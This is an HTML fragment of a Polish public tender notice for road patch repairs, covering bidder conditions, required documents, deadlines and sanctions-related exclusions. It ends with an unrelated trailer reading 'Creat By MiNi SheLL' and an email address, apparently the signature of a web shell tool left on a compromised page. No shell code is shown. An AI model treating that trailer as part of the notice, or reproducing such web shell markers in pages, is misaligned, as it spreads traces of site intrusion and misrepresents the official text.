<h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie wykonał dla remontów cząstkowych emulsją i grysami – „PATCHER” jedno zadanie o wartości minimum 150<br/>000,00 zł/brutto – dla każdej z części przedmiotu zamówienia.<br/>b) dysponuje osobami, zdolnymi do realizacji zamówienia tj. min. jedną osobą na stanowisku Kierownika Budowy,<br/>posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub<br/>odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, dla każdej z części<br/>przedmiotu zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakres wykonanych przez nie czynności oraz informacją om<br/>podstawie do dysponowania tymi osobami.<br/>c) dysponuje narzędziami niezbędnymi do wykonania zamówienia publicznego: remonterem typu – „PATCHER”<br/>(technologia otaczania grysu emulsją) w ilości co najmniej 2 szt., do wyłącznej dyspozycji Zamawiającego - dla każdej z<br/>części przedmiotu zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Formularz oferty, według<br/>wzoru stanowiącego załącznik nr 1a (cz.1), nr 1b (cz.2), nr 1c (cz.3) do SWZ;<br/>2. Pełnomocnictwa lub inne dokumenty, z których wynika prawo do podpisania oferty, oświadczeń i dokumentów, w sytuacji określonej w Rozdziale XIV ust. 2 lub w przypadku składania oferty wspólnej (Rozdział XII ust. 1) - jeżeli dotyczy i dla każdej z części<br/>oddzielnie;<br/>3. Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania (aktualne na<br/>dzień składania ofert) – zgodnie z Załącznikiem nr 2A do SWZ - dla każdej z części oddzielnie;<br/>4. Zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy - zgodnie z załącznikiem nr 2B do SWZ - dla każdej z części<br/>oddzielnie;<br/>5. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – jeżeli dotyczy – (składają wyłącznie<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia – zgodnie z załącznikiem nr 3 do SWZ) - dla każdej z części<br/>oddzielnie.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają w załączniku nr 3 - dla każdej z części<br/>oddzielnie do SWZ), które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy zostało określony w zał. nr 5a do SWZ w paragrafie 15 i 16, w zał. nr 5b do SWZ w paragrafie<br/>15 i 16, w zał. nr 5c do SWZ w paragrafie 15 i 16 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/sp_goleniow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-10 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> charakterze obligatoryjnym. Na podstawie przepisów ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz.<br/>835 z późn. zm.) z postępowania o udzielenie zamówienia Zamawiający wyklucza Wykonawcę:<br/>- wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 tej ustawy<br/>(art. 7 ust. 1 pkt 1 wskazanej ustawy);<br/>- którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz<br/>finansowaniu terroryzmu (tekst jednolity: Dz. U. z 2022 r. poz. 593 z późn. zm.) jest osoba wymieniona w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem<br/>rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 tej ustawy (art. 7 ust. 1 pkt 2 wskazanej ustawy);<br/>- którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (tekst<br/>jednolity: Dz. U. z 2021 r. poz. 217 z późn. zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu<br/>765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r.,<br/>o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 tej ustawy (art. 7 ust. 1 pkt 3 wskazanej ustawy).<br/>Lista osób i podmiotów, wobec których zastosowanie mają wskazane wyżej podstawy wykluczenia wynikające z ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego, jest prowadzona przez Ministra Spraw Wewnętrznych i Administracji i<br/>dostępna pod następującym adresem internetowym: https://www.gov.pl/web/mswia/lista-osob-i-podmiotowobjetychsankcjami#_<br/>ftn6.<br/>Zamawiający może zweryfikować treść oświadczenia o którym mowa w art. 125 ust. 1 ustawy Pzp, m.in. w zakresie podstaw<br/>wykluczenia wynikających z przepisów ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę (…) w oparciu o dostępne mu źródła takie jak m.in. ogólnodostępne bazy<br/>danych, w szczególności rejestry publiczne w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne. Zamawiający uprawniony będzie także do żądania wyjaśnień dotyczących<br/>treści złożonego oświadczenia, w tym będzie mógł zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji<br/>lub dokumentów istotnych dla oceny braku podstaw wykluczenia, o przedstawienie takich informacji lub dokumentów.<br/>Wykonawca, który podlega wykluczeniu na postawie wskazanych wyżej podstaw wykluczenia wynikających z przepisów<br/>ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>(…), osoba lub podmiot podlegające wykluczeniu, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia<br/>publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego, podlegają karze pieniężnej nakładanej<br/>przez Prezesa UZP, w drodze decyzji, w wysokości do 20 000 000 zł.<br/>Szczegółowe informacje dotyczące postępowania zawarte są w specyfikacji warunków zamówienia udostępnionej na stronie<br/>internetowej prowadzonego postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com